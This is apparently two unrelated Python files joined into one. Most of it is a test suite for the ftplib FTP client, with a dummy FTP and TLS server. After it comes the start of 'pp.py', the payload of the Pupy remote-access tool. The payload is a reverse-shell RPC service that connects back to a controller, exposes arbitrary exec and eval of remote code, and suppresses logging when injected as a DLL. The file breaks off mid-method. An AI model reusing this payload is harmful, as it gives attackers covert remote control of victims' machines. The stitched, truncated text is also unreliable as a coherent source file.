self.set_terminator(b"\r\n")
self.in_buffer = []
self.dtp = None
self.last_received_cmd = None
self.last_received_data = ''
self.next_response = ''
self.next_data = None
self.rest = None
self.next_retr_data = RETR_DATA
self.push('220 welcome')
def collect_incoming_data(self, data):
self.in_buffer.append(data)
def found_terminator(self):
line = b''.join(self.in_buffer).decode('ascii')
self.in_buffer = []
if self.next_response:
self.push(self.next_response)
self.next_response = ''
cmd = line.split(' ')[0].lower()
self.last_received_cmd = cmd
space = line.find(' ')
if space != -1:
arg = line[space + 1:]
else:
arg = ""
if hasattr(self, 'cmd_' + cmd):
method = getattr(self, 'cmd_' + cmd)
method(arg)
else:
self.push('550 command "%s" not understood.' %cmd)
def handle_error(self):
raise Exception
def push(self, data):
asynchat.async_chat.push(self, data.encode('ascii') + b'\r\n')
def cmd_port(self, arg):
addr = list(map(int, arg.split(',')))
ip = '%d.%d.%d.%d' %tuple(addr[:4])
port = (addr[4] * 256) + addr[5]
s = socket.create_connection((ip, port), timeout=TIMEOUT)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_pasv(self, arg):
with socket.socket() as sock:
sock.bind((self.socket.getsockname()[0], 0))
sock.listen()
sock.settimeout(TIMEOUT)
ip, port = sock.getsockname()[:2]
            ip = ip.replace('.', ','); p1, p2 = divmod(port, 256)
self.push('227 entering passive mode (%s,%d,%d)' %(ip, p1, p2))
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
def cmd_eprt(self, arg):
af, ip, port = arg.split(arg[0])[1:-1]
port = int(port)
s = socket.create_connection((ip, port), timeout=TIMEOUT)
self.dtp = self.dtp_handler(s, baseclass=self)
self.push('200 active data connection established')
def cmd_epsv(self, arg):
with socket.socket(socket.AF_INET6) as sock:
sock.bind((self.socket.getsockname()[0], 0))
sock.listen()
sock.settimeout(TIMEOUT)
port = sock.getsockname()[1]
self.push('229 entering extended passive mode (|||%d|)' %port)
conn, addr = sock.accept()
self.dtp = self.dtp_handler(conn, baseclass=self)
def cmd_echo(self, arg):
# sends back the received string (used by the test suite)
self.push(arg)
def cmd_noop(self, arg):
self.push('200 noop ok')
def cmd_user(self, arg):
self.push('331 username ok')
def cmd_pass(self, arg):
self.push('230 password ok')
def cmd_acct(self, arg):
self.push('230 acct ok')
def cmd_rnfr(self, arg):
self.push('350 rnfr ok')
def cmd_rnto(self, arg):
self.push('250 rnto ok')
def cmd_dele(self, arg):
self.push('250 dele ok')
def cmd_cwd(self, arg):
self.push('250 cwd ok')
def cmd_size(self, arg):
self.push('250 1000')
def cmd_mkd(self, arg):
self.push('257 "%s"' %arg)
def cmd_rmd(self, arg):
self.push('250 rmd ok')
def cmd_pwd(self, arg):
self.push('257 "pwd ok"')
def cmd_type(self, arg):
self.push('200 type ok')
def cmd_quit(self, arg):
self.push('221 quit ok')
self.close()
def cmd_abor(self, arg):
self.push('226 abor ok')
def cmd_stor(self, arg):
self.push('125 stor ok')
def cmd_rest(self, arg):
self.rest = arg
self.push('350 rest ok')
def cmd_retr(self, arg):
self.push('125 retr ok')
if self.rest is not None:
offset = int(self.rest)
else:
offset = 0
self.dtp.push(self.next_retr_data[offset:])
self.dtp.close_when_done()
self.rest = None
def cmd_list(self, arg):
self.push('125 list ok')
self.dtp.push(LIST_DATA)
self.dtp.close_when_done()
def cmd_nlst(self, arg):
self.push('125 nlst ok')
self.dtp.push(NLST_DATA)
self.dtp.close_when_done()
def cmd_opts(self, arg):
self.push('200 opts ok')
def cmd_mlsd(self, arg):
self.push('125 mlsd ok')
self.dtp.push(MLSD_DATA)
self.dtp.close_when_done()
def cmd_setlongretr(self, arg):
# For testing. Next RETR will return long line.
self.next_retr_data = 'x' * int(arg)
self.push('125 setlongretr ok')
class DummyFTPServer(asyncore.dispatcher, threading.Thread):
handler = DummyFTPHandler
def __init__(self, address, af=socket.AF_INET):
threading.Thread.__init__(self)
asyncore.dispatcher.__init__(self)
self.create_socket(af, socket.SOCK_STREAM)
self.bind(address)
self.listen(5)
self.active = False
self.active_lock = threading.Lock()
self.host, self.port = self.socket.getsockname()[:2]
self.handler_instance = None
def start(self):
assert not self.active
self.__flag = threading.Event()
threading.Thread.start(self)
self.__flag.wait()
def run(self):
self.active = True
self.__flag.set()
while self.active and asyncore.socket_map:
self.active_lock.acquire()
asyncore.loop(timeout=0.1, count=1)
self.active_lock.release()
asyncore.close_all(ignore_all=True)
def stop(self):
assert self.active
self.active = False
self.join()
def handle_accepted(self, conn, addr):
self.handler_instance = self.handler(conn)
def handle_connect(self):
self.close()
handle_read = handle_connect
def writable(self):
return 0
def handle_error(self):
raise Exception
if ssl is not None:
CERTFILE = os.path.join(os.path.dirname(__file__), "keycert3.pem")
CAFILE = os.path.join(os.path.dirname(__file__), "pycacert.pem")
class SSLConnection(asyncore.dispatcher):
"""An asyncore.dispatcher subclass supporting TLS/SSL."""
_ssl_accepting = False
_ssl_closing = False
def secure_connection(self):
socket = ssl.wrap_socket(self.socket, suppress_ragged_eofs=False,
certfile=CERTFILE, server_side=True,
do_handshake_on_connect=False,
ssl_version=ssl.PROTOCOL_SSLv23)
self.del_channel()
self.set_socket(socket)
self._ssl_accepting = True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
elif err.args[0] == ssl.SSL_ERROR_EOF:
return self.handle_close()
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def _do_ssl_shutdown(self):
self._ssl_closing = True
try:
self.socket = self.socket.unwrap()
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return
except OSError as err:
# Any "socket error" corresponds to a SSL_ERROR_SYSCALL return
# from OpenSSL's SSL_shutdown(), corresponding to a
# closed socket condition. See also:
# http://www.mail-archive.com/openssl-users@openssl.org/msg60710.html
pass
self._ssl_closing = False
if getattr(self, '_ccc', False) is False:
super(SSLConnection, self).close()
else:
pass
def handle_read_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).handle_read_event()
def handle_write_event(self):
if self._ssl_accepting:
self._do_ssl_handshake()
elif self._ssl_closing:
self._do_ssl_shutdown()
else:
super(SSLConnection, self).handle_write_event()
def send(self, data):
try:
return super(SSLConnection, self).send(data)
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN,
ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return 0
raise
def recv(self, buffer_size):
try:
return super(SSLConnection, self).recv(buffer_size)
except ssl.SSLError as err:
if err.args[0] in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
return b''
if err.args[0] in (ssl.SSL_ERROR_EOF, ssl.SSL_ERROR_ZERO_RETURN):
self.handle_close()
return b''
raise
def handle_error(self):
raise Exception
def close(self):
if (isinstance(self.socket, ssl.SSLSocket) and
self.socket._sslobj is not None):
self._do_ssl_shutdown()
else:
super(SSLConnection, self).close()
class DummyTLS_DTPHandler(SSLConnection, DummyDTPHandler):
"""A DummyDTPHandler subclass supporting TLS/SSL."""
def __init__(self, conn, baseclass):
DummyDTPHandler.__init__(self, conn, baseclass)
if self.baseclass.secure_data_channel:
self.secure_connection()
class DummyTLS_FTPHandler(SSLConnection, DummyFTPHandler):
"""A DummyFTPHandler subclass supporting TLS/SSL."""
dtp_handler = DummyTLS_DTPHandler
def __init__(self, conn):
DummyFTPHandler.__init__(self, conn)
self.secure_data_channel = False
self._ccc = False
def cmd_auth(self, line):
"""Set up secure control channel."""
self.push('234 AUTH TLS successful')
self.secure_connection()
def cmd_ccc(self, line):
self.push('220 Reverting back to clear-text')
self._ccc = True
self._do_ssl_shutdown()
def cmd_pbsz(self, line):
"""Negotiate size of buffer for secure data transfer.
For TLS/SSL the only valid value for the parameter is '0'.
Any other value is accepted but ignored.
"""
self.push('200 PBSZ=0 successful.')
def cmd_prot(self, line):
"""Setup un/secure data channel."""
arg = line.upper()
if arg == 'C':
self.push('200 Protection set to Clear')
self.secure_data_channel = False
elif arg == 'P':
self.push('200 Protection set to Private')
self.secure_data_channel = True
else:
self.push("502 Unrecognized PROT type (use C or P).")
class DummyTLS_FTPServer(DummyFTPServer):
handler = DummyTLS_FTPHandler
class TestFTPClass(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def check_data(self, received, expected):
self.assertEqual(len(received), len(expected))
self.assertEqual(received, expected)
def test_getwelcome(self):
self.assertEqual(self.client.getwelcome(), '220 welcome')
def test_sanitize(self):
self.assertEqual(self.client.sanitize('foo'), repr('foo'))
self.assertEqual(self.client.sanitize('pass 12345'), repr('pass *****'))
self.assertEqual(self.client.sanitize('PASS 12345'), repr('PASS *****'))
def test_exceptions(self):
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 400')
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 499')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 500')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 599')
self.assertRaises(ftplib.error_proto, self.client.sendcmd, 'echo 999')
def test_all_errors(self):
exceptions = (ftplib.error_reply, ftplib.error_temp, ftplib.error_perm,
ftplib.error_proto, ftplib.Error, OSError, EOFError)
for x in exceptions:
try:
raise x('exception not included in all_errors set')
except ftplib.all_errors:
pass
def test_set_pasv(self):
# passive mode is supposed to be enabled by default
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(True)
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(False)
self.assertFalse(self.client.passiveserver)
def test_voidcmd(self):
self.client.voidcmd('echo 200')
self.client.voidcmd('echo 299')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 199')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 300')
def test_login(self):
self.client.login()
def test_acct(self):
self.client.acct('passwd')
def test_rename(self):
self.client.rename('a', 'b')
self.server.handler_instance.next_response = '200'
self.assertRaises(ftplib.error_reply, self.client.rename, 'a', 'b')
def test_delete(self):
self.client.delete('foo')
self.server.handler_instance.next_response = '199'
self.assertRaises(ftplib.error_reply, self.client.delete, 'foo')
def test_size(self):
self.client.size('foo')
def test_mkd(self):
dir = self.client.mkd('/foo')
self.assertEqual(dir, '/foo')
def test_rmd(self):
self.client.rmd('foo')
def test_cwd(self):
dir = self.client.cwd('/foo')
self.assertEqual(dir, '250 cwd ok')
def test_pwd(self):
dir = self.client.pwd()
self.assertEqual(dir, 'pwd ok')
def test_quit(self):
self.assertEqual(self.client.quit(), '221 quit ok')
# Ensure the connection gets closed; sock attribute should be None
self.assertEqual(self.client.sock, None)
def test_abort(self):
self.client.abort()
def test_retrbinary(self):
def callback(data):
received.append(data.decode('ascii'))
received = []
self.client.retrbinary('retr', callback)
self.check_data(''.join(received), RETR_DATA)
def test_retrbinary_rest(self):
def callback(data):
received.append(data.decode('ascii'))
for rest in (0, 10, 20):
received = []
self.client.retrbinary('retr', callback, rest=rest)
self.check_data(''.join(received), RETR_DATA[rest:])
def test_retrlines(self):
received = []
self.client.retrlines('retr', received.append)
self.check_data(''.join(received), RETR_DATA.replace('\r\n', ''))
def test_storbinary(self):
f = io.BytesIO(RETR_DATA.encode('ascii'))
self.client.storbinary('stor', f)
self.check_data(self.server.handler_instance.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storbinary('stor', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
def test_storbinary_rest(self):
f = io.BytesIO(RETR_DATA.replace('\r\n', '\n').encode('ascii'))
for r in (30, '30'):
f.seek(0)
self.client.storbinary('stor', f, rest=r)
self.assertEqual(self.server.handler_instance.rest, str(r))
def test_storlines(self):
f = io.BytesIO(RETR_DATA.replace('\r\n', '\n').encode('ascii'))
self.client.storlines('stor', f)
self.check_data(self.server.handler_instance.last_received_data, RETR_DATA)
# test new callback arg
flag = []
f.seek(0)
self.client.storlines('stor foo', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
f = io.StringIO(RETR_DATA.replace('\r\n', '\n'))
# storlines() expects a binary file, not a text file
with support.check_warnings(('', BytesWarning), quiet=True):
self.assertRaises(TypeError, self.client.storlines, 'stor foo', f)
def test_nlst(self):
self.client.nlst()
self.assertEqual(self.client.nlst(), NLST_DATA.split('\r\n')[:-1])
def test_dir(self):
l = []
self.client.dir(lambda x: l.append(x))
self.assertEqual(''.join(l), LIST_DATA.replace('\r\n', ''))
def test_mlsd(self):
list(self.client.mlsd())
list(self.client.mlsd(path='/'))
list(self.client.mlsd(path='/', facts=['size', 'type']))
ls = list(self.client.mlsd())
for name, facts in ls:
self.assertIsInstance(name, str)
self.assertIsInstance(facts, dict)
self.assertTrue(name)
self.assertIn('type', facts)
self.assertIn('perm', facts)
self.assertIn('unique', facts)
def set_data(data):
self.server.handler_instance.next_data = data
def test_entry(line, type=None, perm=None, unique=None, name=None):
type = 'type' if type is None else type
perm = 'perm' if perm is None else perm
unique = 'unique' if unique is None else unique
name = 'name' if name is None else name
set_data(line)
_name, facts = next(self.client.mlsd())
self.assertEqual(_name, name)
self.assertEqual(facts['type'], type)
self.assertEqual(facts['perm'], perm)
self.assertEqual(facts['unique'], unique)
# plain
test_entry('type=type;perm=perm;unique=unique; name\r\n')
# "=" in fact value
test_entry('type=ty=pe;perm=perm;unique=unique; name\r\n', type="ty=pe")
test_entry('type==type;perm=perm;unique=unique; name\r\n', type="=type")
test_entry('type=t=y=pe;perm=perm;unique=unique; name\r\n', type="t=y=pe")
test_entry('type=====;perm=perm;unique=unique; name\r\n', type="====")
# spaces in name
test_entry('type=type;perm=perm;unique=unique; na me\r\n', name="na me")
test_entry('type=type;perm=perm;unique=unique; name \r\n', name="name ")
test_entry('type=type;perm=perm;unique=unique; name\r\n', name=" name")
test_entry('type=type;perm=perm;unique=unique; n am e\r\n', name="n am e")
# ";" in name
test_entry('type=type;perm=perm;unique=unique; na;me\r\n', name="na;me")
test_entry('type=type;perm=perm;unique=unique; ;name\r\n', name=";name")
test_entry('type=type;perm=perm;unique=unique; ;name;\r\n', name=";name;")
test_entry('type=type;perm=perm;unique=unique; ;;;;\r\n', name=";;;;")
# case sensitiveness
set_data('Type=type;TyPe=perm;UNIQUE=unique; name\r\n')
_name, facts = next(self.client.mlsd())
for x in facts:
self.assertTrue(x.islower())
# no data (directory empty)
set_data('')
self.assertRaises(StopIteration, next, self.client.mlsd())
set_data('')
for x in self.client.mlsd():
self.fail("unexpected data %s" % x)
def test_makeport(self):
with self.client.makeport():
# IPv4 is in use, just make sure send_eprt has not been used
self.assertEqual(self.server.handler_instance.last_received_cmd,
'port')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), timeout=TIMEOUT)
conn.close()
# IPv4 is in use, just make sure send_epsv has not been used
self.assertEqual(self.server.handler_instance.last_received_cmd, 'pasv')
def test_with_statement(self):
self.client.quit()
def is_client_connected():
if self.client.sock is None:
return False
try:
self.client.sendcmd('noop')
except (OSError, EOFError):
return False
return True
# base test
with ftplib.FTP(timeout=TIMEOUT) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.assertTrue(is_client_connected())
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
# QUIT sent inside the with block
with ftplib.FTP(timeout=TIMEOUT) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.client.quit()
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
# force a wrong response code to be sent on QUIT: error_perm
# is expected and the connection is supposed to be closed
try:
with ftplib.FTP(timeout=TIMEOUT) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.server.handler_instance.next_response = '550 error on quit'
except ftplib.error_perm as err:
self.assertEqual(str(err), '550 error on quit')
else:
self.fail('Exception not raised')
# needed to give the threaded server some time to set the attribute
# which otherwise would still be == 'noop'
time.sleep(0.1)
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit')
self.assertFalse(is_client_connected())
def test_source_address(self):
self.client.quit()
port = support.find_unused_port()
try:
self.client.connect(self.server.host, self.server.port,
source_address=(HOST, port))
self.assertEqual(self.client.sock.getsockname()[1], port)
self.client.quit()
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to port %d" % port)
raise
def test_source_address_passive_connection(self):
port = support.find_unused_port()
self.client.source_address = (HOST, port)
try:
with self.client.transfercmd('list') as sock:
self.assertEqual(sock.getsockname()[1], port)
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to port %d" % port)
raise
def test_parse257(self):
self.assertEqual(ftplib.parse257('257 "/foo/bar"'), '/foo/bar')
self.assertEqual(ftplib.parse257('257 "/foo/bar" created'), '/foo/bar')
self.assertEqual(ftplib.parse257('257 ""'), '')
self.assertEqual(ftplib.parse257('257 "" created'), '')
self.assertRaises(ftplib.error_reply, ftplib.parse257, '250 "/foo/bar"')
# The 257 response is supposed to include the directory
# name and in case it contains embedded double-quotes
# they must be doubled (see RFC-959, chapter 7, appendix 2).
self.assertEqual(ftplib.parse257('257 "/foo/b""ar"'), '/foo/b"ar')
self.assertEqual(ftplib.parse257('257 "/foo/b""ar" created'), '/foo/b"ar')
def test_line_too_long(self):
self.assertRaises(ftplib.Error, self.client.sendcmd,
'x' * self.client.maxline * 2)
def test_retrlines_too_long(self):
self.client.sendcmd('SETLONGRETR %d' % (self.client.maxline * 2))
received = []
self.assertRaises(ftplib.Error,
self.client.retrlines, 'retr', received.append)
def test_storlines_too_long(self):
f = io.BytesIO(b'x' * self.client.maxline * 2)
self.assertRaises(ftplib.Error, self.client.storlines, 'stor', f)
@skipUnless(support.IPV6_ENABLED, "IPv6 not enabled")
class TestIPv6Environment(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOSTv6, 0), af=socket.AF_INET6)
self.server.start()
self.client = ftplib.FTP(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_af(self):
self.assertEqual(self.client.af, socket.AF_INET6)
def test_makeport(self):
with self.client.makeport():
self.assertEqual(self.server.handler_instance.last_received_cmd,
'eprt')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), timeout=TIMEOUT)
conn.close()
self.assertEqual(self.server.handler_instance.last_received_cmd, 'epsv')
def test_transfer(self):
def retr():
def callback(data):
received.append(data.decode('ascii'))
received = []
self.client.retrbinary('retr', callback)
self.assertEqual(len(''.join(received)), len(RETR_DATA))
self.assertEqual(''.join(received), RETR_DATA)
self.client.set_pasv(True)
retr()
self.client.set_pasv(False)
retr()
@skipUnless(ssl, "SSL not available")
class TestTLS_FTPClassMixin(TestFTPClass):
"""Repeat TestFTPClass tests starting the TLS layer for both control
and data connections first.
"""
def setUp(self):
self.server = DummyTLS_FTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP_TLS(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
# enable TLS
self.client.auth()
self.client.prot_p()
@skipUnless(ssl, "SSL not available")
class TestTLS_FTPClass(TestCase):
"""Specific TLS_FTP class tests."""
def setUp(self):
self.server = DummyTLS_FTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP_TLS(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_control_connection(self):
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.auth()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
def test_data_connection(self):
# clear text
with self.client.transfercmd('list') as sock:
self.assertNotIsInstance(sock, ssl.SSLSocket)
self.assertEqual(self.client.voidresp(), "226 transfer complete")
# secured, after PROT P
self.client.prot_p()
with self.client.transfercmd('list') as sock:
self.assertIsInstance(sock, ssl.SSLSocket)
self.assertEqual(self.client.voidresp(), "226 transfer complete")
# PROT C is issued, the connection must be in cleartext again
self.client.prot_c()
with self.client.transfercmd('list') as sock:
self.assertNotIsInstance(sock, ssl.SSLSocket)
self.assertEqual(self.client.voidresp(), "226 transfer complete")
def test_login(self):
# login() is supposed to implicitly secure the control connection
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.login()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
# make sure that AUTH TLS doesn't get issued again
self.client.login()
def test_auth_issued_twice(self):
self.client.auth()
self.assertRaises(ValueError, self.client.auth)
def test_auth_ssl(self):
try:
self.client.ssl_version = ssl.PROTOCOL_SSLv23
self.client.auth()
self.assertRaises(ValueError, self.client.auth)
finally:
self.client.ssl_version = ssl.PROTOCOL_TLSv1
def test_context(self):
self.client.quit()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(ValueError, ftplib.FTP_TLS, keyfile=CERTFILE,
context=ctx)
self.assertRaises(ValueError, ftplib.FTP_TLS, certfile=CERTFILE,
context=ctx)
self.assertRaises(ValueError, ftplib.FTP_TLS, certfile=CERTFILE,
keyfile=CERTFILE, context=ctx)
self.client = ftplib.FTP_TLS(context=ctx, timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.auth()
self.assertIs(self.client.sock.context, ctx)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.client.prot_p()
with self.client.transfercmd('list') as sock:
self.assertIs(sock.context, ctx)
self.assertIsInstance(sock, ssl.SSLSocket)
def test_ccc(self):
self.assertRaises(ValueError, self.client.ccc)
self.client.login(secure=True)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.client.ccc()
self.assertRaises(ValueError, self.client.sock.unwrap)
def test_check_hostname(self):
self.client.quit()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.check_hostname = True
ctx.load_verify_locations(CAFILE)
self.client = ftplib.FTP_TLS(context=ctx, timeout=TIMEOUT)
# 127.0.0.1 doesn't match SAN
self.client.connect(self.server.host, self.server.port)
with self.assertRaises(ssl.CertificateError):
self.client.auth()
# exception quits connection
self.client.connect(self.server.host, self.server.port)
self.client.prot_p()
with self.assertRaises(ssl.CertificateError):
with self.client.transfercmd("list") as sock:
pass
self.client.quit()
self.client.connect("localhost", self.server.port)
self.client.auth()
self.client.quit()
self.client.connect("localhost", self.server.port)
self.client.prot_p()
with self.client.transfercmd("list") as sock:
pass
class TestTimeouts(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(20)
self.port = support.bind_port(self.sock)
self.server_thread = threading.Thread(target=self.server)
self.server_thread.start()
# Wait for the server to be ready.
self.evt.wait()
self.evt.clear()
self.old_port = ftplib.FTP.port
ftplib.FTP.port = self.port
def tearDown(self):
ftplib.FTP.port = self.old_port
self.server_thread.join()
def server(self):
# This method sets the evt 3 times:
# 1) when the connection is ready to be accepted.
# 2) when it is safe for the caller to close the connection
# 3) when we have closed the socket
self.sock.listen()
# (1) Signal the caller that we are ready to accept the connection.
self.evt.set()
try:
conn, addr = self.sock.accept()
except socket.timeout:
pass
else:
conn.sendall(b"1 Hola mundo\n")
conn.shutdown(socket.SHUT_WR)
# (2) Signal the caller that it is safe to close the socket.
self.evt.set()
conn.close()
finally:
self.sock.close()
def testTimeoutDefault(self):
# default -- use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP(HOST)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutNone(self):
# no timeout -- do not use global socket timeout
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP(HOST, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(ftp.sock.gettimeout())
self.evt.wait()
ftp.close()
def testTimeoutValue(self):
# a value
ftp = ftplib.FTP(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutConnect(self):
ftp = ftplib.FTP()
ftp.connect(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDifferentOrder(self):
ftp = ftplib.FTP(timeout=30)
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDirectAccess(self):
ftp = ftplib.FTP()
ftp.timeout = 30
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
class MiscTestCase(TestCase):
def test__all__(self):
blacklist = {'MSG_OOB', 'FTP_PORT', 'MAXLINE', 'CRLF', 'B_CRLF',
'Error', 'parse150', 'parse227', 'parse229', 'parse257',
'print_line', 'ftpcp', 'test'}
support.check__all__(self, ftplib, blacklist=blacklist)
def test_main():
tests = [TestFTPClass, TestTimeouts,
TestIPv6Environment,
TestTLS_FTPClassMixin, TestTLS_FTPClass,
MiscTestCase]
thread_info = support.threading_setup()
try:
support.run_unittest(*tests)
finally:
support.threading_cleanup(*thread_info)
if __name__ == '__main__':
test_main()
|
pp.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# ---------------------------------------------------------------
# Copyright (c) 2015, Nicolas VERDIER (contact@n1nj4.eu)
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE
# ---------------------------------------------------------------
import site
import sys
import time
import rpyc
from rpyc.core.service import Service, ModuleNamespace
from rpyc.lib.compat import execute, is_py3k
import rpyc.core.stream
import rpyc.utils.factory
import threading
import weakref
import traceback
import os
import subprocess
import threading
import StringIO
import json
import urllib2
import urllib
import platform
import re
import ssl
import random
import imp
import json
import argparse
from network import conf
from network.lib.base_launcher import LauncherError
import logging
import shlex
try:
import additional_imports #additional imports needed to package with pyinstaller
except ImportError:
pass
except Exception as e:
logging.warning(e)
if hasattr(sys, 'frozen') and sys.frozen:
    logging.disable(logging.CRITICAL) # disable all logging, because it can make the injected pupy dll unresponsive
else:
logging.getLogger().setLevel(logging.ERROR)
def add_pseudo_pupy_module():
""" add a pseudo pupy module for *nix payloads """
if not "pupy" in sys.modules:
mod = imp.new_module("pupy")
mod.__name__="pupy"
mod.__file__="<memimport>\\\\pupy"
mod.__package__="pupy"
sys.modules["pupy"]=mod
mod.pseudo=True
try:
import pupy
except ImportError:
if "pupy" not in sys.modules:
add_pseudo_pupy_module()
if "pupy" not in sys.modules:
add_pseudo_pupy_module()
import pupy
pupy.infos={} #global dictionary to store information that persists across a disconnection
LAUNCHER="connect" # the default launcher to start when no argv
LAUNCHER_ARGS=shlex.split("--host 127.0.0.1:443 --transport ssl") # default launcher arguments
REVERSE_SLAVE_CONF=dict(
allow_all_attrs = True,
allow_public_attrs = True,
allow_pickle = True,
allow_getattr = True,
allow_setattr = True,
allow_delattr = True,
import_custom_exceptions = False,
propagate_SystemExit_locally = True,
propagate_KeyboardInterrupt_locally = True,
instantiate_custom_exceptions = True,
instantiate_oldstyle_exceptions = True,
)
class ReverseSlaveService(Service):
""" Pupy reverse shell rpyc service """
__slots__=["exposed_namespace"]
def on_connect(self):
self.exposed_namespace = {}
self._conn._config.update(REVERSE_SLAVE_CONF)
self._conn.root.set_modules(ModuleNamespace(self.exposed_getmodule))
def on_disconnect(self):
print "disconnecting !"
try:
self._conn.close()
except:
pass
raise
def exposed_exit(self):
print "exiting ..."
raise SystemExit
def exposed_execute(self, text):
"""execute arbitrary code (using ``exec``)"""
execute(text, self.exposed_namespace)
def exposed_get_infos(self, s):
"""execute arbitrary code (using ``exec``)"""
import pupy
if not s in pupy.infos:
return None
return pupy.infos[s]
def exposed_eval(self, text):
"""evaluate arbitrary code (using ``eval``)"""
return eval(text, self.exposed_namespace)
def exposed_getmodule(self, name):
